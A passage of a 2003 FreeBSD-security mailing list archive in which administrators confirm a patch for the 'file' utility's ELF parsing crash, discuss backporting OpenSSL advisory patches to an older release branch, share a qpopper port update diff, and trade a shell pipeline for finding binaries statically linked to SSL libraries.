src/contrib/file/readelf.c.patched Thu Mar 13 14:13:12 2003 > -------------------------- > Patching file src/contrib/file/readelf.c using Plan A... > Hunk #1 succeeded at 10. > Hunk #2 succeeded at 102. > Hunk #3 succeeded at 145. > done > > bash-2.05b$ cd src/usr.bin/file > > bash-2.05b$ make > cc -O -pipe -DMAGIC='"/usr/share/misc/magic"' -DBUILTIN_ELF -DELFCORE > -DHAVE_CONFIG_H -I/usr/src/usr.bin/file > -I/usr/src/usr.bin/file/../../contrib/file -c > /usr/src/usr.bin/file/../../contrib/file/readelf.c > cc -O -pipe -DMAGIC='"/usr/share/misc/magic"' -DBUILTIN_ELF -DELFCORE > -DHAVE_CONFIG_H -I/usr/src/usr.bin/file > -I/usr/src/usr.bin/file/../../contrib/file -o file file.o apprentice.o > fsmagic.o softmagic.o ascmagic.o compress.o is_tar.o readelf.o print-hacked.o > Warning: Object directory not changed from original /usr/src/usr.bin/file > > bash-2.05b$ su > Password: > > su-2.05b# make install > install -s -o root -g wheel -m 555 file /usr/bin > install -o root -g wheel -m 444 magic magic.mgc > /usr/src/usr.bin/file/../../contrib/file/magic.mime magic.mime.mgc > /usr/share/misc > install -o root -g wheel -m 444 file.1.gz /usr/share/man/man1 > install -o root -g wheel -m 444 magic.5.gz /usr/share/man/man5 > > su-2.05b# exit > exit > > (TESTING again) > bash-2.05b$ cd /tmp > > bash-2.05b$ file badfile > badfile: ELF 32-bit LSB relocatable, AT&T WE32100 - invalid byte order, > version 1 (SYSV)file: corrupted section header size. > (=> file no longer seems vulnerable) > > bash-2.05b$ tail -1 /var/log/messages > Mar 13 14:27:25 wwwback file: file command buffer overflow attempt against > user 501/501 ? > (if you used the syslog-able version) > =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= > > > Hope this will be helpfull to some of you. Lemme know if anything needs > further talk or whatever. Guy, The patch works for me on: daggar>$ uname -a FreeBSD daggar.mynet.local 4.8-RC FreeBSD 4.8-RC #0: Wed Mar 12 14:11:55 CST 2003 root@daggar.mynet.local:/usr/obj/usr/src/sys/DAGGAR i386 With system standard file installed: daggar>$ file badfile Segmentation fault (core dumped) daggar>$ Now with patch applyed and usr.bin/file rebuilt/installed daggar>$ file badfile badfile: ELF 32-bit LSB relocatable, AT&T WE32100 - invalid byte order, version 1 (SYSV)file: corrupted section header size. daggar>$ Thanks for working on this. Regards, Stephen Hilton nospam@hiltonbsd.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 13 7:10:14 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id DF4C337B401 for ; Thu, 13 Mar 2003 07:10:11 -0800 (PST) Received: from mx1.dev.itouchnet.net (itouchlabs.com [196.15.188.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id F379B43F75 for ; Thu, 13 Mar 2003 07:10:06 -0800 (PST) (envelope-from bvi@itouchlabs.com) Received: from nobody by mx1.dev.itouchnet.net with scanned_ok (Exim 3.35 #1) id 18tUMb-0001CV-00 for freebsd-security@freebsd.org; Thu, 13 Mar 2003 17:11:21 +0200 Received: from itouchlabs.com ([196.15.188.2] helo=Beastie) by mx1.dev.itouchnet.net with esmtp (Exim 3.35 #1) id 18tUMa-0001CD-00; Thu, 13 Mar 2003 17:11:20 +0200 Message-ID: <002d01c2e972$98675e90$4508a8c0@Beastie> From: "Barry Irwin" To: , "security at FreeBSD" References: <20030313080852.A30434@sheol.localdomain> Subject: Re: SA-03:02.openssl for RELENG_4_6_2 vs. RELENG_4_5 Date: Thu, 13 Mar 2003 17:08:53 +0200 Organization: iTouch Labs MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 X-Checked: This message has been scanned for any virusses and unauthorized attachments. X-iScan-ID: 4613-1047568281-36285@unconfigured version $Name: REL_2_0_4 $ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Not directly answering your question, but an alternative is us build the openssl port with OVERWRITE_BASE defined. Barry ----- Original Message ----- From: "D J Hawkey Jr" To: "security at FreeBSD" Sent: Thursday, March 13, 2003 4:08 PM Subject: SA-03:02.openssl for RELENG_4_6_2 vs. RELENG_4_5 > Hello All. > > This is my last hope for "Are the SA-03:02.openssl patches for > RELENG_4_6_2 appropriate for RELENG_4_5?". > > After a dry-run, it appears that only the FreeBSD CVS version numbers > keep some half-dozen of the SA-03:02 patches from applying. > > FreeBSD released 4.4 with OpenSSL 0.9.6a. FreeBSD released 4.5 with the > same (though it may have had changes?). FreeBSD released 4.6.2 with > OpenSSL 0.9.e. > > OK. So as I go about cvsup'ing along the RELENG_4_5 tree, at p13, the > source is upgraded to OpenSSL 0.9.6e. At p18, it got an ASN.1 patch. So > did RELENG_4_6, at p10. Both RELENGs continued to get the same patches > until RELENG_4_5 support was dropped. So, up through RELENG_4_6_2 p7 > (p8 is SA-03:02), the two RELENGs had the same OpenSSL trees, right? > > Therefore: Does anyone know that the SA-03:02 patches for RELENG_4_6_2 > should not be applied to a RELENG_4_5 tree (after getting by the above > versioning SNAFU)? > > Thanks, > Dave > > -- > ______________________ ______________________ > \__________________ \ D. J. HAWKEY JR. / __________________/ > \________________/\ hawkeyd@visi.com /\________________/ > http://www.visi.com/~hawkeyd/ > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 13 7:10:48 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D773C37B404 for ; Thu, 13 Mar 2003 07:10:44 -0800 (PST) Received: from lava.sentex.ca (pyroxene.sentex.ca [199.212.134.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5938843F3F for ; Thu, 13 Mar 2003 07:10:43 -0800 (PST) (envelope-from mike@sentex.net) Received: from simian.sentex.net (simeon.sentex.ca [192.168.43.27]) by lava.sentex.ca (8.12.8/8.12.8) with ESMTP id h2DFAg8w089512 for ; Thu, 13 Mar 2003 10:10:42 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <5.2.0.9.0.20030313100451.044b5dd8@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.2.0.9 Date: Thu, 13 Mar 2003 10:15:37 -0500 To: security@FreeBSD.ORG From: Mike Tancsa Subject: Patch to qpopper port files In-Reply-To: References: <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> <5.2.0.9.0.20030311221739.073ac2f0@marble.sentex.ca> <4.3.2.7.2.20030312123805.03d83a20@localhost> <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (lava/20020517) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The diffs below to the Makefile and distinfo seem to do the trick for anyone wanting to grab an updated version before the port gets committed. This works for me, YMMV. ---Mike --- Makefile.prev +++ Makefile @@ -6,7 +6,7 @@ # PORTNAME= qpopper -PORTVERSION= 4.0.4 +PORTVERSION= 4.0.5 PORTREVISION= 1 CATEGORIES= mail ipv6 MASTER_SITES= ftp://ftp.qualcomm.com/eudora/servers/unix/popper/%SUBDIR%/ @@ -17,7 +17,7 @@ .if ${OSVERSION} >= 400014 && !defined(WITHOUT_IPV6) PATCH_SITES= http://www.imasy.or.jp/~ume/ipv6/ -PATCHFILES= qpopper4.0.4-ipv6-20020502.diff.gz +PATCHFILES= qpopper4.0.5-ipv6-20030313.diff.gz PATCH_DIST_STRIP= -p1 .endif At 02:54 PM 13/03/2003 +0900, Hajimu UMEMOTO wrote: >Hi, > > >>>>> On Wed, 12 Mar 2003 14:55:43 -0500 > >>>>> Mike Tancsa said: > >mike> I dont see the offical release yet, but I imagine the guy is on the >west >mike> coast, so its not quite afternoon there. > >I don't see offcial announce yet, it seems 4.0.5 was out. > >mike> The only patch that does not apply cleanly in the port is the ipv6 >patch. > >I've just updated my IPv6 patch for 4.0.5: > > http://www.imasy.or.jp/~ume/ipv6/qpopper4.0.5-ipv6-20030313.diff.gz > >Sincerely, > >-- >Hajimu UMEMOTO @ Internet Mutual Aid Society Yokohama, Japan >ume@mahoroba.org ume@bisd.hitachi.co.jp ume@{,jp.}FreeBSD.org >http://www.imasy.org/~ume/ > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 13 9:16:52 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8626A37B404 for ; Thu, 13 Mar 2003 09:16:49 -0800 (PST) Received: from rwcrmhc51.attbi.com (rwcrmhc51.attbi.com [204.127.198.38]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5C0A843FBD for ; Thu, 13 Mar 2003 09:16:48 -0800 (PST) (envelope-from bmah@employees.org) Received: from bmah.dyndns.org (12-240-204-110.client.attbi.com[12.240.204.110]) by rwcrmhc51.attbi.com (rwcrmhc51) with ESMTP id <2003031317164705100djh1le>; Thu, 13 Mar 2003 17:16:47 +0000 Received: from intruder.bmah.org (localhost [127.0.0.1]) by bmah.dyndns.org (8.12.8/8.12.8) with ESMTP id h2DHGlWp019504; Thu, 13 Mar 2003 09:16:47 -0800 (PST) (envelope-from bmah@intruder.bmah.org) Received: (from bmah@localhost) by intruder.bmah.org (8.12.8/8.12.8/Submit) id h2DHGlYa019503; Thu, 13 Mar 2003 09:16:47 -0800 (PST) Date: Thu, 13 Mar 2003 09:16:47 -0800 From: "Bruce A. Mah" To: D J Hawkey Jr Cc: security at FreeBSD Subject: Re: SA-03:02.openssl for RELENG_4_6_2 vs. RELENG_4_5 Message-ID: <20030313171647.GA19381@intruder.bmah.org> References: <20030313080852.A30434@sheol.localdomain> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="fUYQa+Pmc3FrFX/N" Content-Disposition: inline In-Reply-To: <20030313080852.A30434@sheol.localdomain> User-Agent: Mutt/1.4i X-Image-Url: http://www.employees.org/~bmah/Images/bmah-cisco-small.gif X-url: http://www.employees.org/~bmah/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --fUYQa+Pmc3FrFX/N Content-Type: text/plain; charset=us-ascii Content-Disposition: inline If memory serves me right, D J Hawkey Jr wrote: > OK. So as I go about cvsup'ing along the RELENG_4_5 tree, at p13, the > source is upgraded to OpenSSL 0.9.6e. At p18, it got an ASN.1 patch. So > did RELENG_4_6, at p10. Both RELENGs continued to get the same patches > until RELENG_4_5 support was dropped. So, up through RELENG_4_6_2 p7 > (p8 is SA-03:02), the two RELENGs had the same OpenSSL trees, right? Probably. In theory, just because the version numbers are the same doesn't mean that there weren't minor tweaks. I think this is pretty unlikely, however. [1] Any reason you can't just check out copies of src/contrib/openssl for the RELENG_4_5 and RELENG_4_6 branches and diff them? If the only deltas are version numbers, you're probably safe. Bruce. [1] This statement is based only on my own recollections of OpenSSL imports and upgrades around this time. You could look to see if I documented any changes in the release notes or errata, but I don't remember doing anything like this. --fUYQa+Pmc3FrFX/N Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (FreeBSD) iD8DBQE+cLz+2MoxcVugUsMRAjGQAKD39yn7UPzwwAXHbCkPNcqRP8UHJACdEy6b f1R2gjMQhVJFTg2vDXSO/JU= =UE8Q -----END PGP SIGNATURE----- --fUYQa+Pmc3FrFX/N-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 13 9:54: 6 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 17C1837B401; Thu, 13 Mar 2003 09:54:03 -0800 (PST) Received: from bodb.mc.mpls.visi.com (bodb.mc.mpls.visi.com [208.42.156.104]) by mx1.FreeBSD.org (Postfix) with ESMTP id 4204543F75; Thu, 13 Mar 2003 09:54:02 -0800 (PST) (envelope-from hawkeyd@visi.com) Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193]) by bodb.mc.mpls.visi.com (Postfix) with ESMTP id 97BB94BEB; Thu, 13 Mar 2003 11:54:01 -0600 (CST) Received: (from hawkeyd@localhost) by sheol.localdomain (8.11.6/8.11.6) id h2DHs0X68608; Thu, 13 Mar 2003 11:54:00 -0600 (CST) (envelope-from hawkeyd) Date: Thu, 13 Mar 2003 11:54:00 -0600 From: D J Hawkey Jr To: "Bruce A. Mah" Cc: security at FreeBSD Subject: Re: SA-03:02.openssl for RELENG_4_6_2 vs. RELENG_4_5 Message-ID: <20030313115400.A25510@sheol.localdomain> Reply-To: hawkeyd@visi.com References: <20030313080852.A30434@sheol.localdomain> <20030313171647.GA19381@intruder.bmah.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20030313171647.GA19381@intruder.bmah.org>; from bmah@FreeBSD.ORG on Thu, Mar 13, 2003 at 09:16:47AM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mar 13, at 09:16 AM, Bruce A. Mah wrote: > > > OK. So as I go about cvsup'ing along the RELENG_4_5 tree, at p13, the > > source is upgraded to OpenSSL 0.9.6e. At p18, it got an ASN.1 patch. So > > did RELENG_4_6, at p10. Both RELENGs continued to get the same patches > > until RELENG_4_5 support was dropped. So, up through RELENG_4_6_2 p7 > > (p8 is SA-03:02), the two RELENGs had the same OpenSSL trees, right? > > Probably. In theory, just because the version numbers are the same > doesn't mean that there weren't minor tweaks. I think this is pretty > unlikely, however. [1] I can accept that tweaks made in the RELENG_4_5 tree might get lost in patching upwards to 0.9.6i with SA-03:02; at least I'll know I can probably continue patching the OpenSSL tree against RELENG_4_6 updates. > Any reason you can't just check out copies of src/contrib/openssl for > the RELENG_4_5 and RELENG_4_6 branches and diff them? If the only > deltas are version numbers, you're probably safe. Um, sheer number of files vs. Time, mostly. For those six files that had rejected patches, I changed the versions in the patchfile to those of the sources, and the entire update occured without incident. BZZT! "Oh, I'm sorry, discussion time is over." Throwing caution to the wind, I started a buildworld against the updated source about 45 minutes ago. Anyone know how to run the tests in /usr/src/crypto/openssl/apps and/or /usr/src/crypto/openssl/test, and what to look for? :-) Oh! I also need to know how one ascertains what binaries are statically linked to libcrypto and/or libssl? > Bruce. Thanks, Dave -- ______________________ ______________________ \__________________ \ D. J. HAWKEY JR. / __________________/ \________________/\ hawkeyd@visi.com /\________________/ http://www.visi.com/~hawkeyd/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Mar 13 12:19:53 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A9B6637B401; Thu, 13 Mar 2003 12:19:50 -0800 (PST) Received: from bran.mc.mpls.visi.com (bran.mc.mpls.visi.com [208.42.156.103]) by mx1.FreeBSD.org (Postfix) with ESMTP id 107CE43FA3; Thu, 13 Mar 2003 12:19:49 -0800 (PST) (envelope-from hawkeyd@visi.com) Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193]) by bran.mc.mpls.visi.com (Postfix) with ESMTP id 4BD874D1D; Thu, 13 Mar 2003 14:19:48 -0600 (CST) Received: (from hawkeyd@localhost) by sheol.localdomain (8.11.6/8.11.6) id h2DKJl000660; Thu, 13 Mar 2003 14:19:47 -0600 (CST) (envelope-from hawkeyd) Date: Thu, 13 Mar 2003 14:19:47 -0600 From: D J Hawkey Jr To: "Bruce A. Mah" Cc: security at FreeBSD Subject: Re: SA-03:02.openssl for RELENG_4_6_2 vs. RELENG_4_5 Message-ID: <20030313141947.A600@sheol.localdomain> Reply-To: hawkeyd@visi.com References: <20030313080852.A30434@sheol.localdomain> <20030313171647.GA19381@intruder.bmah.org> <20030313115400.A25510@sheol.localdomain> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20030313115400.A25510@sheol.localdomain>; from hawkeyd@visi.com on Thu, Mar 13, 2003 at 11:54:00AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mar 13, at 11:54 AM, D J Hawkey Jr wrote: > > BZZT! "Oh, I'm sorry, discussion time is over." > > Throwing caution to the wind, I started a buildworld against the updated > source about 45 minutes ago. The build went without a hitch: $ uname -v FreeBSD 4.5-RELEASE-p24.4 #0: Thu Mar 13 12:30:11 CST 2003 root@sheol.localdomain:/usr/obj/usr/src/sys/SHEOL $ openssl OpenSSL> version OpenSSL 0.9.6i Feb 19 2003 OpenSSL>q SSH'ing to a Sun box and back works, as does SSL'd fetchmail. So: - Anyone know how to run the tests in /usr/src/crypto/openssl/apps and/or /usr/src/crypto/openssl/test? What does one look for? - How does one ascertain what binaries are statically linked to libcrypto and/or libssl? libcrypt, too? Exactly what libraries am I interested in? Dave -- ______________________ ______________________ \__________________ \ D. J. HAWKEY JR. / __________________/ \________________/\ hawkeyd@visi.com /\________________/ http://www.visi.com/~hawkeyd/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 14 10:12:41 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1087A37B401 for ; Fri, 14 Mar 2003 10:12:38 -0800 (PST) Received: from bodb.mc.mpls.visi.com (bodb.mc.mpls.visi.com [208.42.156.104]) by mx1.FreeBSD.org (Postfix) with ESMTP id 5FAB443F75 for ; Fri, 14 Mar 2003 10:12:37 -0800 (PST) (envelope-from hawkeyd@visi.com) Received: from sheol.localdomain (hawkeyd-fw.dsl.visi.com [208.42.101.193]) by bodb.mc.mpls.visi.com (Postfix) with ESMTP id C85E44CE8 for ; Fri, 14 Mar 2003 12:12:36 -0600 (CST) Received: (from hawkeyd@localhost) by sheol.localdomain (8.11.6/8.11.6) id h2EICav08369 for freebsd-security@freebsd.org; Fri, 14 Mar 2003 12:12:36 -0600 (CST) (envelope-from hawkeyd) Date: Fri, 14 Mar 2003 12:12:35 -0600 From: D J Hawkey Jr To: security at FreeBSD Subject: Re: SA-03:02.openssl for RELENG_4_6_2 vs. RELENG_4_5 Message-ID: <20030314121235.A8200@sheol.localdomain> Reply-To: hawkeyd@visi.com References: <20030313080852.A30434@sheol.localdomain> <20030313171647.GA19381@intruder.bmah.org> <20030313115400.A25510@sheol.localdomain> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <20030313115400.A25510@sheol.localdomain>; from hawkeyd@visi.com on Thu, Mar 13, 2003 at 11:54:00AM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mar 13, at 11:54 AM, D J Hawkey Jr wrote: > > Oh! I also need to know how one ascertains what binaries are statically > linked to libcrypto and/or libssl? Got it. Try this: find $DIR -type f \ |xargs readelf -a 2>/dev/null \ |awk '/^File:/ { name = $2; printed = 0; } \ /SSL|TLS/ { if (!printed) { print name; printed = 1; } }' \ |xargs ldd 2>/dev/null This might be too liberal, but better safe than sorry. If it returns just filenames, they're statically-linked. On my workstation, only Mozilla has components (12 libraries) that are statically-linked to SSL/TLS code, but I don't know if they use the system SSL/TLS libraries, or if they're completely self-contained. > Anyone know how to run the tests in /usr/src/crypto/openssl/apps and/or > /usr/src/crypto/openssl/test, and what to look for? :-) This I still need help with. Thanks, Dave -- ______________________ ______________________ \__________________ \ D. J. HAWKEY JR. / __________________/ \________________/\ hawkeyd@visi.com /\________________/ http://www.visi.com/~hawkeyd/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 14 11:11:33 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 1356637B401 for ; Fri, 14 Mar 2003 11:11:31 -0800 (PST) Received: from lariat.org (lariat.org [63.229.157.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id B1B0B43FD7 for ; Fri, 14 Mar 2003 11:11:29 -0800 (PST) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp1000.lariat.org@lariat.org [63.229.157.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id MAA24977; Fri, 14 Mar 2003 12:11:18 -0700 (MST) X-message-flag: Warning! Use of Microsoft Outlook renders your system susceptible to Internet worms. Message-Id: <4.3.2.7.2.20030314121038.02c9d630@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Fri, 14 Mar 2003 12:11:16 -0700 To: Mike Tancsa , security@FreeBSD.ORG From: Brett Glass Subject: Re: Patch to qpopper port files In-Reply-To: <5.2.0.9.0.20030313100451.044b5dd8@marble.sentex.ca> References: <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> <5.2.0.9.0.20030311221739.073ac2f0@marble.sentex.ca> <4.3.2.7.2.20030312123805.03d83a20@localhost> <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 08:15 AM 3/13/2003, Mike Tancsa wrote: >The diffs below to the Makefile and distinfo seem to do the trick for anyone wanting to grab an updated version before the port gets committed. This works for me, YMMV. This doesn't seem to work on 4.7. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 14 11:46: 7 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0216E37B401 for ; Fri, 14 Mar 2003 11:46:05 -0800 (PST) Received: from lava.sentex.ca (pyroxene.sentex.ca [199.212.134.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id DEB5843F3F for ; Fri, 14 Mar 2003 11:46:03 -0800 (PST) (envelope-from mike@sentex.net) Received: from simian.sentex.net (simeon.sentex.ca [192.168.43.27]) by lava.sentex.ca (8.12.8/8.12.8) with ESMTP id h2EJk28w098568; Fri, 14 Mar 2003 14:46:03 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <5.2.0.9.0.20030314145040.041dc3d8@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.2.0.9 Date: Fri, 14 Mar 2003 14:51:29 -0500 To: Brett Glass , security@FreeBSD.ORG From: Mike Tancsa Subject: Re: Patch to qpopper port files In-Reply-To: <4.3.2.7.2.20030314121038.02c9d630@localhost> References: <5.2.0.9.0.20030313100451.044b5dd8@marble.sentex.ca> <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> <5.2.0.9.0.20030311221739.073ac2f0@marble.sentex.ca> <4.3.2.7.2.20030312123805.03d83a20@localhost> <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (lava/20020517) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 12:11 PM 14/03/2003 -0700, Brett Glass wrote: >At 08:15 AM 3/13/2003, Mike Tancsa wrote: > > >The diffs below to the Makefile and distinfo seem to do the trick for > anyone wanting to grab an updated version before the port gets > committed. This works for me, YMMV. > >This doesn't seem to work on 4.7. What is the error that you get ? Did you update your ports tree first via cvsup, and then applied the patch ? ---Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 14 11:57:51 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D89B337B401 for ; Fri, 14 Mar 2003 11:57:48 -0800 (PST) Received: from arthur.nitro.dk (port324.ds1-khk.adsl.cybercity.dk [212.242.113.79]) by mx1.FreeBSD.org (Postfix) with ESMTP id 425F943F85 for ; Fri, 14 Mar 2003 11:57:47 -0800 (PST) (envelope-from simon@arthur.nitro.dk) Received: by arthur.nitro.dk (Postfix, from userid 1000) id A72B010BF94; Fri, 14 Mar 2003 20:57:45 +0100 (CET) Date: Fri, 14 Mar 2003 20:57:45 +0100 From: "Simon L. Nielsen" To: Mike Tancsa Cc: security@FreeBSD.ORG Subject: Re: Patch to qpopper port files Message-ID: <20030314195744.GB454@nitro.dk> References: <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> <5.2.0.9.0.20030311221739.073ac2f0@marble.sentex.ca> <4.3.2.7.2.20030312123805.03d83a20@localhost> <5.2.0.9.0.20030312145029.0572f058@marble.sentex.ca> <5.2.0.9.0.20030313100451.044b5dd8@marble.sentex.ca> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="VS++wcV0S1rZb1Fb" Content-Disposition: inline In-Reply-To: <5.2.0.9.0.20030313100451.044b5dd8@marble.sentex.ca> User-Agent: Mutt/1.5.3i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --VS++wcV0S1rZb1Fb Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On 2003.03.13 10:15:37 -0500, Mike Tancsa wrote: > The diffs below to the Makefile and distinfo seem to do the trick for=20 > anyone wanting to grab an updated version before the port gets=20 > committed. This works for me, YMMV. It looks like the distinfo change did not make it into your patch. That could perhaps cause problem Brett Glass is having? > --- Makefile.prev > +++ Makefile > @@ -6,7 +6,7 @@ > # >=20 > PORTNAME=3D qpopper > -PORTVERSION=3D 4.0.4 > +PORTVERSION=3D 4.0.5 > PORTREVISION=3D 1 > CATEGORIES=3D mail ipv6 > MASTER_SITES=3D ftp://ftp.qualcomm.com/eudora/servers/unix/popper/%SUBD= IR%/ > @@ -17,7 +17,7 @@ >=20 > .if ${OSVERSION} >=3D 400014 && !defined(WITHOUT_IPV6) > PATCH_SITES=3D http://www.imasy.or.jp/~ume/ipv6/ > -PATCHFILES=3D qpopper4.0.4-ipv6-20020502.diff.gz > +PATCHFILES=3D qpopper4.0.5-ipv6-20030313.diff.gz > PATCH_DIST_STRIP=3D -p1 > .endif --=20 Simon L. Nielsen --VS++wcV0S1rZb1Fb Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (FreeBSD) iD8DBQE+cjQ48kocFXgPTRwRAqtAAJ9nTqJNb3yXZ6N+cM/0954d0B/AsgCg1NPx bRI7wwJ4N624z/r3YM9S34s= =7czQ -----END PGP SIGNATURE----- --VS++wcV0S1rZb1Fb-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Mar 14 12:26:11 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id E82AA37B401 for ; Fri, 14 Mar 2003 12:26:07 -0800 (PST) Received: from lava.sentex.ca (pyroxene.sentex.ca [199.212.134.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id 146B343F75 for ; Fri, 14 Mar 2003 12:26:07 -0800 (PST) (envelope-from mike@sentex.net) Received: from simian.sentex.net (simeon.sentex.ca [192.168.43.27]) by lava.sentex.ca (8.12.8/8.12.8) with ESMTP id h2EKQ68w098962; Fri, 14 Mar 2003 15:26:06 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: 